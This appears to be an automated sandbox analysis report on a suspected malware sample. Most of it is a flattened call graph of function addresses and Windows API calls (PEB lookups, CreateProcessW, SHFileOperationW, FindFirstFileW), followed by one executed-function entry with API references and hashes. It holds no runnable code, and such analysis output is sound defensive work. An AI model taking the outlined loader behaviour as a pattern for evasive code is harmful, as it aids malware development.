6333->6335 6337 3e3f00 GetPEB 6334->6337 6336 3e47cb GetCurrentProcessId 6335->6336 6338 3e3f00 GetPEB 6335->6338 6342 3e47d5 6336->6342 6339 3e478f 6337->6339 6341 3e47b7 6338->6341 6340 3e3e60 GetPEB 6339->6340 6340->6335 6343 3e3e60 GetPEB 6341->6343 6342->6070 6344 3e47c3 6343->6344 6344->6336 6349 3eb2ec 6345->6349 6346 3eb422 6346->6033 6347 3e3f00 GetPEB 6347->6349 6348 3e3e60 GetPEB 6348->6349 6349->6346 6349->6347 6349->6348 6352 3eb1e0 6350->6352 6351 3eb2b2 6351->6070 6351->6351 6352->6351 6353 3e3f00 GetPEB 6352->6353 6354 3e3e60 GetPEB 6352->6354 6353->6352 6354->6352 6357 3e7420 6355->6357 6356 3e7608 6356->6070 6357->6356 6358 3e3e60 GetPEB 6357->6358 6359 3e4fd0 GetPEB 6357->6359 6360 3e3f00 GetPEB 6357->6360 6358->6357 6359->6357 6360->6357 6368 3e8d50 6361->6368 6362 3e8e3f 6363 3e4b70 2 API calls 6362->6363 6365 3e8e4f 6363->6365 6364 3e8e29 6364->6052 6365->6052 6366 3e34c0 GetPEB 6366->6368 6367 3e3f00 GetPEB 6367->6368 6368->6362 6368->6364 6368->6366 6368->6367 6369 3e3e60 GetPEB 6368->6369 6369->6368 6376 3e8753 6370->6376 6371 3e34c0 GetPEB 6371->6376 6372 3e8903 6378 3e3f00 GetPEB 6372->6378 6379 3e8922 6372->6379 6374 3e88df 6374->6044 6375 3e8e80 2 API calls 6375->6376 6376->6371 6376->6372 6376->6374 6376->6375 6377 3e3f00 GetPEB 6376->6377 6385 3e3780 2 API calls 6376->6385 6386 3e3e60 GetPEB 6376->6386 6881 3e7700 6376->6881 6377->6376 6380 3e8916 6378->6380 6381 3e8955 6379->6381 6383 3e3f00 GetPEB 6379->6383 6382 3e3e60 GetPEB 6380->6382 6381->6044 6382->6379 6384 3e8949 6383->6384 6387 3e3e60 GetPEB 6384->6387 6385->6376 6386->6376 6387->6381 6389 3e34e3 6388->6389 6390 3e3f00 GetPEB 6389->6390 6393 3e3508 6389->6393 6391 3e34fc 6390->6391 6392 3e3e60 GetPEB 6391->6392 6392->6393 6394 3e3f00 GetPEB 6393->6394 6397 3e3530 6393->6397 6395 3e3524 6394->6395 6396 3e3e60 GetPEB 6395->6396 6396->6397 6397->6085 6397->6086 6412 3e505c 6398->6412 6399 3e5386 6402 3e53ae 6399->6402 6405 3e3f00 GetPEB 6399->6405 6400 3e5367 6400->6399 6401 3e3f00 GetPEB 6400->6401 6403 3e537a 6401->6403 6402->6119 6404 3e3e60 GetPEB 6403->6404 6404->6399 6409 3e53a2 6405->6409 6406 3e534d RtlAllocateHeap 6406->6402 6406->6412 6408 3e3f00 GetPEB 6408->6412 6410 3e3e60 GetPEB 6409->6410 6410->6402 6411 3e3e60 GetPEB 6411->6412 6412->6400 6412->6402 6412->6406 6412->6408 6412->6411 6413 3e42c0 6412->6413 6414 3e42cd 6413->6414 6415 3e42e3 6413->6415 6416 3e3f00 GetPEB 6414->6416 6419 3e3f00 GetPEB 6415->6419 6422 3e430b 6415->6422 6417 3e42d7 6416->6417 6418 3e3e60 GetPEB 6417->6418 6418->6415 6420 3e42ff 6419->6420 6421 3e3e60 GetPEB 6420->6421 6421->6422 6422->6412 6424 3e3050 6423->6424 6426 3e307a 6424->6426 6438 3e38f0 6424->6438 6426->6146 6427 3e3092 6427->6146 6434 3e7c80 6428->6434 6429 3e7ddd 6432 3e3f00 GetPEB 6429->6432 6433 3e7dfd 6429->6433 6430 3e7d97 6430->6150 6431 3e3f00 GetPEB 6431->6434 6436 3e7df1 6432->6436 6433->6150 6434->6429 6434->6430 6434->6431 6435 3e3e60 GetPEB 6434->6435 6435->6434 6437 3e3e60 GetPEB 6436->6437 6437->6433 6450 3e3910 6438->6450 6439 3e3a3b FindFirstFileW 6443 3e3b8f 6439->6443 6439->6450 6440 3e3ac1 6440->6427 6441 3e3f00 GetPEB 6441->6450 6442 3e3b70 6442->6443 6444 3e3f00 GetPEB 6442->6444 6443->6427 6446 3e3b83 6444->6446 6445 3e3e60 GetPEB 6445->6450 6447 3e3e60 GetPEB 6446->6447 6447->6443 6448 3e34c0 GetPEB 6448->6450 6449 3e38f0 GetPEB 6449->6450 6450->6439 6450->6440 6450->6441 6450->6442 6450->6445 6450->6448 6450->6449 6451 3e3460 GetPEB 6450->6451 6451->6450 6453 3e3795 6452->6453 6454 3e37ab 6452->6454 6455 3e3f00 GetPEB 6453->6455 6457 3e37dd 6454->6457 6459 3e3f00 GetPEB 6454->6459 6456 3e379f 6455->6456 6458 3e3e60 GetPEB 6456->6458 6462 3e3812 6457->6462 6463 3e3f00 GetPEB 6457->6463 6458->6454 6460 3e37d1 6459->6460 6461 3e3e60 GetPEB 6460->6461 6461->6457 6465 3e384a 6462->6465 6467 3e3f00 GetPEB 6462->6467 6464 3e3806 6463->6464 6466 3e3e60 GetPEB 6464->6466 6470 3e3f00 GetPEB 6465->6470 6471 3e3876 6465->6471 6466->6462 6468 3e383e 6467->6468 6469 3e3e60 GetPEB 6468->6469 6469->6465 6472 3e386a 6470->6472 6473 3e38d1 SHFileOperationW 6471->6473 6475 3e3f00 GetPEB 6471->6475 6474 3e3e60 GetPEB 6472->6474 6473->6156 6474->6471 6476 3e38c0 6475->6476 6477 3e3e60 GetPEB 6476->6477 6478 3e38cc 6477->6478 6478->6473 6485 3e1fd2 6479->6485 6480 3e2212 6481 3e2208 6480->6481 6483 3e4220 GetPEB 6480->6483 6481->6179 6482 3e42c0 GetPEB 6482->6485 6483->6481 6484 3e3f00 GetPEB 6484->6485 6485->6480 6485->6481 6485->6482 6485->6484 6486 3e3e60 GetPEB 6485->6486 6486->6485 6495 3e1e86 6487->6495 6488 3e1f77 6489 3e1f68 6488->6489 6490 3e3f00 GetPEB 6488->6490 6489->6179 6491 3e1f98 6490->6491 6493 3e3e60 GetPEB 6491->6493 6492 3e3f00 GetPEB 6492->6495 6493->6489 6494 3e3e60 GetPEB 6494->6495 6495->6488 6495->6489 6495->6492 6495->6494 6497 3e5c26 6496->6497 6498 3e5c10 6496->6498 6502 3e3f00 GetPEB 6497->6502 6506 3e5c4e 6497->6506 6499 3e3f00 GetPEB 6498->6499 6500 3e5c1a 6499->6500 6501 3e3e60 GetPEB 6500->6501 6501->6497 6503 3e5c42 6502->6503 6505 3e3e60 GetPEB 6503->6505 6504 3e5cd2 6504->6179 6505->6506 6506->6504 6507 3e5c99 6506->6507 6508 3e3f00 GetPEB 6506->6508 6511 3e3f00 GetPEB 6507->6511 6512 3e5cc1 6507->6512 6509 3e5c8d 6508->6509 6510 3e3e60 GetPEB 6509->6510 6510->6507 6513 3e5cb5 6511->6513 6512->6179 6514 3e3e60 GetPEB 6513->6514 6514->6512 6516 3e1d06 6515->6516 6517 3e1cf0 6515->6517 6520 3e1dad 6516->6520 6522 3e3f00 GetPEB 6516->6522 6518 3e3f00 GetPEB 6517->6518 6519 3e1cfa 6518->6519 6521 3e3e60 GetPEB 6519->6521 6525 3e1de1 6520->6525 6526 3e3f00 GetPEB 6520->6526 6521->6516 6523 3e1da1 6522->6523 6524 3e3e60 GetPEB 6523->6524 6524->6520 6529 3e4ea0 GetPEB 6525->6529 6527 3e1dd5 6526->6527 6528 3e3e60 GetPEB 6527->6528 6528->6525 6530 3e1e15 6529->6530 6530->6179 6533 3e2255 6531->6533 6532 3e229c 6532->6179 6533->6532 6534 3e3f00 GetPEB 6533->6534 6536 3e25be 6533->6536 6537 3e3e60 GetPEB 6533->6537 6534->6533 6535 3e25cd 6535->6179 6536->6535 6538 3e4220 GetPEB 6536->6538 6537->6533 6538->6535 6551 3e2c1a 6539->6551 6540 3e2fcf 6543 3e2fee 6540->6543 6544 3e3f00 GetPEB 6540->6544 6542 3e2cae 6542->6179 6543->6179 6547 3e2fe2 6544->6547 6545 3e3f00 GetPEB 6545->6551 6546 3e34c0 GetPEB 6546->6551 6548 3e3e60 GetPEB 6547->6548 6548->6543 6549 3e3e60 GetPEB 6549->6551 6550 3e3460 GetPEB 6550->6551 6551->6540 6551->6542 6551->6545 6551->6546 6551->6549 6551->6550 6552 3e4220 GetPEB 6551->6552 6591 3e56f0 6551->6591 6600 3e2980 6551->6600 6552->6551 6557 3e4eb6 6554->6557 6555 3e4f3d 6555->6179 6556 3e3f00 GetPEB 6556->6557 6557->6555 6557->6556 6558 3e3e60 GetPEB 6557->6558 6558->6557 6575 3e191f 6559->6575 6560 3e1bc6 6561 3e35c0 GetPEB 6560->6561 6563 3e1bd0 6561->6563 6562 3e1ba4 6562->6179 6564 3e1bf1 6563->6564 6565 3e3f00 GetPEB 6563->6565 6569 3e1c23 6564->6569 6571 3e3f00 GetPEB 6564->6571 6567 3e1be5 6565->6567 6566 3e3e60 GetPEB 6566->6575 6570 3e3e60 GetPEB 6567->6570 6568 3e4e30 GetPEB 6568->6575 6576 3e3f00 GetPEB 6569->6576 6580 3e1c4b 6569->6580 6570->6564 6572 3e1c17 6571->6572 6574 3e3e60 GetPEB 6572->6574 6573 3e3f00 GetPEB 6573->6575 6574->6569 6575->6560 6575->6562 6575->6566 6575->6568 6575->6573 6613 3e35c0 6575->6613 6577 3e1c3f 6576->6577 6578 3e3e60 GetPEB 6577->6578 6578->6580 6580->6179 6582 3e422d 6581->6582 6585 3e4243 6581->6585 6583 3e3f00 GetPEB 6582->6583 6584 3e4237 6583->6584 6586 3e3e60 GetPEB 6584->6586 6587 3e3f00 GetPEB 6585->6587 6589 3e426b 6585->6589 6586->6585 6588 3e425f 6587->6588 6590 3e3e60 GetPEB 6588->6590 6589->6166 6590->6589 6599 3e5701 6591->6599 6592 3e57e3 6593 3e5723 6592->6593 6595 3e3f00 GetPEB 6592->6595 6593->6551 6594 3e3f00 GetPEB 6594->6599 6596 3e57f6 6595->6596 6597 3e3e60 GetPEB 6596->6597 6597->6593 6598 3e3e60 GetPEB 6598->6599 6599->6592 6599->6593 6599->6594 6599->6598 6606 3e29a0 6600->6606 6601 3e2abf 6603 3e2b0c 6601->6603 6604 3e2ae4 6601->6604 6605 3e3f00 GetPEB 6601->6605 6602 3e3f00 GetPEB 6602->6606 6603->6551 6604->6603 6610 3e3f00 GetPEB 6604->6610 6607 3e2ad8 6605->6607 6606->6601 6606->6602 6609 3e3e60 GetPEB 6606->6609 6608 3e3e60 GetPEB 6607->6608 6608->6604 6609->6606 6611 3e2b00 6610->6611 6612 3e3e60 GetPEB 6611->6612 6612->6603 6614 3e35e4 6613->6614 6615 3e3609 6614->6615 6616 3e3f00 GetPEB 6614->6616 6619 3e3f00 GetPEB 6615->6619 6622 3e3631 6615->6622 6617 3e35fd 6616->6617 6618 3e3e60 GetPEB 6617->6618 6618->6615 6620 3e3625 6619->6620 6621 3e3e60 GetPEB 6620->6621 6621->6622 6622->6575 6624 3e5516 6623->6624 6629 3e552c 6623->6629 6625 3e3f00 GetPEB 6624->6625 6626 3e5520 6625->6626 6627 3e3e60 GetPEB 6626->6627 6627->6629 6628 3e5586 6628->6202 6629->6628 6630 3e3f00 GetPEB 6629->6630 6631 3e557a 6630->6631 6632 3e3e60 GetPEB 6631->6632 6632->6628 6647 3eab66 6633->6647 6634 3eab8c 6634->6216 6637 3eac52 6638 3eac71 6637->6638 6640 3e3f00 GetPEB 6637->6640 6643 3eac99 6638->6643 6644 3e3f00 GetPEB 6638->6644 6639 3e3f00 GetPEB 6639->6647 6641 3eac65 6640->6641 6642 3e3e60 GetPEB 6641->6642 6642->6638 6643->6216 6646 3eac8d 6644->6646 6645 3e3e60 GetPEB 6645->6647 6648 3e3e60 GetPEB 6646->6648 6647->6634 6647->6637 6647->6639 6647->6645 6706 3e4b70 6647->6706 6728 3eacd0 6647->6728 6648->6643 6669 3ea189 6649->6669 6650 3eacd0 GetPEB 6650->6669 6651 3ea552 6653 3ea571 6651->6653 6656 3e3f00 GetPEB 6651->6656 6652 3ea439 6652->6216 6663 3ea599 6653->6663 6664 3e3f00 GetPEB 6653->6664 6655 3e34c0 GetPEB 6655->6669 6659 3ea565 6656->6659 6657 3e4220 GetPEB 6657->6669 6658 3e3e60 GetPEB 6658->6669 6661 3e3e60 GetPEB 6659->6661 6660 3e4b70 2 API calls 6660->6669 6661->6653 6663->6216 6665 3ea58d 6664->6665 6667 3e3e60 GetPEB 6665->6667 6666 3e3460 GetPEB 6666->6669 6667->6663 6668 3e3f00 GetPEB 6668->6669 6669->6650 6669->6651 6669->6652 6669->6655 6669->6657 6669->6658 6669->6660 6669->6666 6669->6668 6738 3eb520 6669->6738 6746 3e1150 6669->6746 6675 3ea7c5 6670->6675 6671 3eaa19 6671->6216 6672 3eacd0 GetPEB 6672->6675 6673 3eaa7c GetCurrentProcessId 6673->6675 6674 3eaacd 6678 3e3f00 GetPEB 6674->6678 6682 3eaaec 6674->6682 6675->6671 6675->6672 6675->6673 6675->6674 6676 3e4b70 2 API calls 6675->6676 6680 3e42c0 GetPEB 6675->6680 6687 3e3f00 GetPEB 6675->6687 6689 3e3e60 GetPEB 6675->6689 6761 3e49a0 6675->6761 6771 3e4850 6675->6771 6676->6675 6681 3eaae0 6678->6681 6680->6675 6683 3e3e60 GetPEB 6681->6683 6684 3eab14 6682->6684 6685 3e3f00 GetPEB 6682->6685 6683->6682 6684->6216 6686 3eab08 6685->6686 6688 3e3e60 GetPEB 6686->6688 6687->6675 6688->6684 6689->6675 6699 3ea5ef 6690->6699 6691 3ea710 6691->6216 6692 3ea731 6694 3ea750 6692->6694 6696 3e3f00 GetPEB 6692->6696 6702 3ea778 6694->6702 6703 3e3f00 GetPEB 6694->6703 6695 3e42c0 GetPEB 6695->6699 6698 3ea744 6696->6698 6697 3e3f00 GetPEB 6697->6699 6700 3e3e60 GetPEB 6698->6700 6699->6691 6699->6692 6699->6695 6699->6697 6701 3e3e60 GetPEB 6699->6701 6780 3e4370 6699->6780 6700->6694 6701->6699 6702->6216 6704 3ea76c 6703->6704 6705 3e3e60 GetPEB 6704->6705 6705->6702 6707 3e4b98 6706->6707 6708 3e4b82 6706->6708 6711 3e4bd7 CreateProcessW 6707->6711 6713 3e3f00 GetPEB 6707->6713 6709 3e3f00 GetPEB 6708->6709 6710 3e4b8c 6709->6710 6712 3e3e60 GetPEB 6710->6712 6714 3e4bf7 6711->6714 6715 3e4c73 6711->6715 6712->6707 6716 3e4bc6 6713->6716 6717 3e4bff 6714->6717 6720 3e3f00 GetPEB 6714->6720 6721 3e4c33 6714->6721 6715->6647 6718 3e3e60 GetPEB 6716->6718 6717->6647 6719 3e4bd2 6718->6719 6719->6711 6722 3e4c27 6720->6722 6724 3e4c5d 6721->6724 6725 3e3f00 GetPEB 6721->6725 6723 3e3e60 GetPEB 6722->6723 6723->6721 6724->6647 6726 3e4c51 6725->6726 6727 3e3e60 GetPEB 6726->6727 6727->6724 6737 3eaced 6728->6737 6729 3eaf9f 6731 3eaf37 6729->6731 6733 3e3f00 GetPEB 6729->6733 6730 3e34c0 GetPEB 6730->6737 6731->6647 6732 3e3f00 GetPEB 6732->6737 6734 3eafb2 6733->6734 6735 3e3e60 GetPEB 6734->6735 6735->6731 6736 3e3e60 GetPEB 6736->6737 6737->6729 6737->6730 6737->6731 6737->6732 6737->6736 6739 3eb536 6738->6739 6740 3eb55f 6739->6740 6741 3eb633 6739->6741 6743 3e3e60 GetPEB 6739->6743 6744 3eb63f 6739->6744 6745 3e3f00 GetPEB 6739->6745 6740->6669 6755 3e4fd0 6741->6755 6743->6739 6744->6669 6745->6739 6754 3e1160 6746->6754 6747 3e124c 6748 3e3f00 GetPEB 6747->6748 6750 3e1244 6747->6750 6749 3e125f 6748->6749 6751 3e3e60 GetPEB 6749->6751 6750->6669 6751->6750 6752 3e3e60 GetPEB 6752->6754 6753 3e3f00 GetPEB 6753->6754 6754->6747 6754->6750 6754->6752 6754->6753 6756 3e4ff9 6755->6756 6757 3e500f 6755->6757 6758 3e3f00 GetPEB 6756->6758 6757->6744 6759 3e5003 6758->6759 6760 3e3e60 GetPEB 6759->6760 6760->6757 6766 3e49c0 6761->6766 6762 3e49ea 6762->6675 6763 3e4b37 6763->6762 6765 3e3f00 GetPEB 6763->6765 6764 3e3f00 GetPEB 6764->6766 6767 3e4b4a 6765->6767 6766->6762 6766->6763 6766->6764 6768 3e34c0 GetPEB 6766->6768 6770 3e3e60 GetPEB 6766->6770 6769 3e3e60 GetPEB 6767->6769 6768->6766 6769->6762 6770->6766 6777 3e4870 6771->6777 6772 3e496e 6774 3e3f00 GetPEB 6772->6774 6775 3e492c 6772->6775 6773 3e3f00 GetPEB 6773->6777 6776 3e4981 6774->6776 6775->6675 6778 3e3e60 GetPEB 6776->6778 6777->6772 6777->6773 6777->6775 6779 3e3e60 GetPEB 6777->6779 6778->6775 6779->6777 6781 3e450e 6780->6781 6782 3e4384 6780->6782 6781->6699 6782->6781 6783 3e3f00 GetPEB 6782->6783 6786 3e43d6 6782->6786 6784 3e43ca 6783->6784 6785 3e3e60 GetPEB 6784->6785 6785->6786 6787 3e3f00 GetPEB 6786->6787 6793 3e4436 6786->6793 6799 3e44f4 6786->6799 6788 3e442a 6787->6788 6789 3e3e60 GetPEB 6788->6789 6789->6793 6790 3e44ba 6800 3e4550 6790->6800 6792 3e3f00 GetPEB 6792->6793 6793->6790 6793->6792 6795 3e3e60 GetPEB 6793->6795 6795->6793 6796 3e3f00 GetPEB 6797 3e44e8 6796->6797 6798 3e3e60 GetPEB 6797->6798 6798->6799 6799->6699 6801 3e456b 6800->6801 6802 3e44d0 6800->6802 6801->6802 6803 3e3f00 GetPEB 6801->6803 6804 3e3e60 GetPEB 6801->6804 6802->6796 6802->6799 6803->6801 6804->6801 6807 3e55c6 6805->6807 6806 3e55e8 6806->6239 6807->6806 6808 3e56a8 6807->6808 6809 3e3f00 GetPEB 6807->6809 6810 3e3e60 GetPEB 6807->6810 6808->6806 6811 3e3f00 GetPEB 6808->6811 6809->6807 6810->6807 6812 3e56bb 6811->6812 6813 3e3e60 GetPEB 6812->6813 6813->6806 6822 3e4ca0 6814->6822 6815 3e3f00 GetPEB 6815->6822 6816 3e4db4 6817 3e4d7c 6816->6817 6818 3e3f00 GetPEB 6816->6818 6817->6239 6820 3e4dc7 6818->6820 6819 3e3e60 GetPEB 6819->6822 6821 3e3e60 GetPEB 6820->6821 6821->6817 6822->6815 6822->6816 6822->6817 6822->6819 6824 3e46d7 6823->6824 6830 3e46ed 6823->6830 6825 3e3f00 GetPEB 6824->6825 6826 3e46e1 6825->6826 6828 3e3e60 GetPEB 6826->6828 6827 3e4760 6827->6247 6828->6830 6829 3e4721 6834 3e4752 6829->6834 6835 3e3f00 GetPEB 6829->6835 6830->6827 6830->6829 6831 3e3f00 GetPEB 6830->6831 6832 3e4715 6831->6832 6833 3e3e60 GetPEB 6832->6833 6833->6829 6834->6247 6836 3e4746 6835->6836 6837 3e3e60 GetPEB 6836->6837 6837->6834 6850 3e25f0 6838->6850 6839 3e2937 6847 3e295f 6839->6847 6849 3e3f00 GetPEB 6839->6849 6840 3e2912 6840->6839 6841 3e3f00 GetPEB 6840->6841 6844 3e292b 6841->6844 6842 3e42c0 GetPEB 6842->6850 6843 3e2771 6843->6271 6846 3e3e60 GetPEB 6844->6846 6845 3e3e60 GetPEB 6845->6850 6846->6839 6847->6271 6848 3e3f00 GetPEB 6848->6850 6851 3e2953 6849->6851 6850->6840 6850->6842 6850->6843 6850->6845 6850->6848 6852 3e3e60 GetPEB 6851->6852 6852->6847 6858 3e1010 6853->6858 6854 3e1105 6856 3e103a 6854->6856 6857 3e3f00 GetPEB 6854->6857 6855 3e3f00 GetPEB 6855->6858 6856->6298 6859 3e1118 6857->6859 6858->6854 6858->6855 6858->6856 6861 3e3e60 GetPEB 6858->6861 6860 3e3e60 GetPEB 6859->6860 6860->6856 6861->6858 6863 3e34c0 GetPEB 6862->6863 6864 3e36c4 6863->6864 6865 3e36e5 6864->6865 6866 3e3f00 GetPEB 6864->6866 6869 3e371a 6865->6869 6870 3e3f00 GetPEB 6865->6870 6867 3e36d9 6866->6867 6868 3e3e60 GetPEB 6867->6868 6868->6865 6872 3e3742 6869->6872 6874 3e3f00 GetPEB 6869->6874 6871 3e370e 6870->6871 6873 3e3e60 GetPEB 6871->6873 6877 3e376e 6872->6877 6878 3e3f00 GetPEB 6872->6878 6873->6869 6875 3e3736 6874->6875 6876 3e3e60 GetPEB 6875->6876 6876->6872 6877->6070 6879 3e3762 6878->6879 6880 3e3e60 GetPEB 6879->6880 6880->6877 6882 3e7712 6881->6882 6883 3e34c0 GetPEB 6882->6883 6884 3e77b3 6882->6884 6885 3e3f00 GetPEB 6882->6885 6886 3e78a3 6882->6886 6891 3e3e60 GetPEB 6882->6891 6883->6882 6887 3e3f00 GetPEB 6884->6887 6888 3e77d2 6884->6888 6885->6882 6886->6376 6889 3e77c6 6887->6889 6888->6376 6890 3e3e60 GetPEB 6889->6890 6890->6888 6891->6882 7121 3e9b60 7129 3e9b80 7121->7129 7122 3e9d96 7124 3e9d12 7122->7124 7125 3e3f00 GetPEB 7122->7125 7123 3e9dd0 GetPEB 7123->7129 7126 3e9da9 7125->7126 7127 3e3e60 GetPEB 7126->7127 7127->7124 7128 3e3f00 GetPEB 7128->7129 7129->7122 7129->7123 7129->7124 7129->7128 7130 3e3e60 GetPEB 7129->7130 7130->7129 7131 3e47e0 7132 3e4c80 GetPEB 7131->7132 7133 3e47f5 7132->7133 6981 3ea198 7001 3ea189 6981->7001 6982 3eacd0 GetPEB 6982->7001 6983 3ea552 6987 3e3f00 GetPEB 6983->6987 6990 3ea571 6983->6990 6984 3ea439 6985 3e1150 GetPEB 6985->7001 6986 3e34c0 GetPEB 6986->7001 6989 3ea565 6987->6989 6988 3e4220 GetPEB 6988->7001 6992 3e3e60 GetPEB 6989->6992 6994 3ea599 6990->6994 6995 3e3f00 GetPEB 6990->6995 6991 3e4b70 2 API calls 6991->7001 6992->6990 6993 3eb520 GetPEB 6993->7001 6996 3ea58d 6995->6996 6999 3e3e60 GetPEB 6996->6999 6997 3e3f00 GetPEB 6997->7001 6998 3e3460 GetPEB 6998->7001 6999->6994 7000 3e3e60 GetPEB 7000->7001 7001->6982 7001->6983 7001->6984 7001->6985 7001->6986 7001->6988 7001->6991 7001->6993 7001->6997 7001->6998 7001->7000 7140 3e1fd8 7146 3e1fd2 7140->7146 7141 3e2212 7142 3e2208 7141->7142 7144 3e4220 GetPEB 7141->7144 7143 3e42c0 GetPEB 7143->7146 7144->7142 7145 3e3f00 GetPEB 7145->7146 7146->7141 7146->7142 7146->7143 7146->7145 7147 3e3e60 GetPEB 7146->7147 7147->7146 7002 3eb110 7003 3eb124 7002->7003 7004 3e6060 GetPEB 7003->7004 7014 3eb1aa 7003->7014 7005 3eb136 7004->7005 7006 3e3310 GetPEB 7005->7006 7007 3eb14c 7006->7007 7008 3eb182 7007->7008 7009 3e3f00 GetPEB 7007->7009 7012 3e3f00 GetPEB 7008->7012 7008->7014 7010 3eb176 7009->7010 7011 3e3e60 GetPEB 7010->7011 7011->7008 7013 3eb19e 7012->7013 7015 3e3e60 GetPEB 7013->7015 7015->7014 7016 3e6208 7025 3e6202 7016->7025 7017 3e42c0 GetPEB 7017->7025 7018 3e55b0 GetPEB 7018->7025 7019 3e624b 7020 3e4c80 GetPEB 7020->7025 7021 3e3f00 GetPEB 7021->7025 7022 3e6490 7023 3e3e60 GetPEB 7023->7025 7024 3e3f00 GetPEB 7027 3e642d 7024->7027 7025->7017 7025->7018 7025->7019 7025->7020 7025->7021 7025->7023 7025->7027 7026 3e3e60 GetPEB 7026->7027 7027->7022 7027->7024 7027->7026 7028 3e6608 7069 3e65fd 7028->7069 7029 3e94d0 GetPEB 7029->7069 7030 3e6dcd 7039 3eb2e0 GetPEB 7030->7039 7031 3e7410 GetPEB 7031->7069 7032 3e8bb0 2 API calls 7032->7069 7033 3e706e 7038 3e8740 3 API calls 7033->7038 7034 3e9f30 GetPEB 7034->7069 7035 3e68df 7036 3e9050 GetPEB 7036->7069 7037 3eb1d0 GetPEB 7037->7069 7045 3e7073 7038->7045 7039->7035 7040 3e7061 7043 3e8d40 2 API calls 7040->7043 7041 3e72d0 GetPEB 7041->7069 7042 3e9860 6 API calls 7042->7069 7052 3e7066 7043->7052 7044 3e61e0 GetPEB 7044->7069 7046 3e80a0 3 API calls 7046->7069 7047 3e53d0 GetPEB 7047->7069 7048 3e6f27 GetTickCount 7048->7069 7049 3e9270 GetPEB 7049->7069 7050 3e7120 3 API calls 7050->7069 7051 3e8700 GetPEB 7051->7069 7053 3e4770 2 API calls 7053->7069 7054 3e3310 GetPEB 7054->7069 7055 3e12b0 2 API calls 7055->7069 7056 3eb430 3 API calls 7056->7069 7057 3e4220 GetPEB 7057->7069 7058 3e8970 2 API calls 7058->7069 7059 3e8e80 2 API calls 7059->7069 7060 3e6060 GetPEB 7060->7069 7061 3e8400 2 API calls 7061->7069 7062 3e3e60 GetPEB 7062->7069 7063 3e6975 GetTickCount 7063->7069 7064 3e1840 GetPEB 7064->7069 7065 3e9620 2 API calls 7065->7069 7066 3eafe0 GetPEB 7066->7069 7067 3e3460 GetPEB 7067->7069 7068 3e3f00 GetPEB 7068->7069 7069->7029 7069->7030 7069->7031 7069->7032 7069->7033 7069->7034 7069->7035 7069->7036 7069->7037 7069->7040 7069->7041 7069->7042 7069->7044 7069->7046 7069->7047 7069->7048 7069->7049 7069->7050 7069->7051 7069->7053 7069->7054 7069->7055 7069->7056 7069->7057 7069->7058 7069->7059 7069->7060 7069->7061 7069->7062 7069->7063 7069->7064 7069->7065 7069->7066 7069->7067 7069->7068 7070 3e4160 GetPEB 7069->7070 7070->7069 5969 3e3780 5970 3e3795 5969->5970 5971 3e37ab 5969->5971 5972 3e3f00 GetPEB 5970->5972 5974 3e37dd 5971->5974 5976 3e3f00 GetPEB 5971->5976 5973 3e379f 5972->5973 5975 3e3e60 GetPEB 5973->5975 5979 3e3812 5974->5979 5980 3e3f00 GetPEB 5974->5980 5975->5971 5977 3e37d1 5976->5977 5978 3e3e60 GetPEB 5977->5978 5978->5974 5982 3e384a 5979->5982 5984 3e3f00 GetPEB 5979->5984 5981 3e3806 5980->5981 5983 3e3e60 GetPEB 5981->5983 5987 3e3f00 GetPEB 5982->5987 5988 3e3876 5982->5988 5983->5979 5985 3e383e 5984->5985 5986 3e3e60 GetPEB 5985->5986 5986->5982 5989 3e386a 5987->5989 5990 3e38d1 SHFileOperationW 5988->5990 5992 3e3f00 GetPEB 5988->5992 5991 3e3e60 GetPEB 5989->5991 5991->5988 5993 3e38c0 5992->5993 5994 3e3e60 GetPEB 5993->5994 5995 3e38cc 5994->5995 5995->5990 7083 3e2b80 7084 3e2b99 7083->7084 7085 3e2baf 7083->7085 7086 3e3f00 GetPEB 7084->7086 7087 3e2ba3 7086->7087 7088 3e3e60 GetPEB 7087->7088 7088->7085 7148 3e7e40 7156 3e7e50 7148->7156 7149 3e7f83 7151 3e38f0 2 API calls 7149->7151 7150 3e7f7a 7152 3e7f96 7151->7152 7153 3e34c0 GetPEB 7153->7156 7154 3e3e60 GetPEB 7154->7156 7155 3e3f00 GetPEB 7155->7156 7156->7149 7156->7150 7156->7153 7156->7154 7156->7155

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 002D0448
                                                          • Part of subcall function 002D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002D0EFD,00000000), ref: 002D1155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 002D0463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002D0484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 002D048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002D0492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 002D049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002D04A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002D04B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002D04E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002D04F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 002D0519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 002D0530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 002D0547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 002D0562
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279660601.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_2d0000_mfc140.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: e89fcd0d4599c3d0a2007ea6af4610ccb5c3b28cd23abd02339175211b486740
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: 6A414FB19243417EE710EBA1C846F6BB2EDAB88740F408D1EB64897791D674DD248F62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
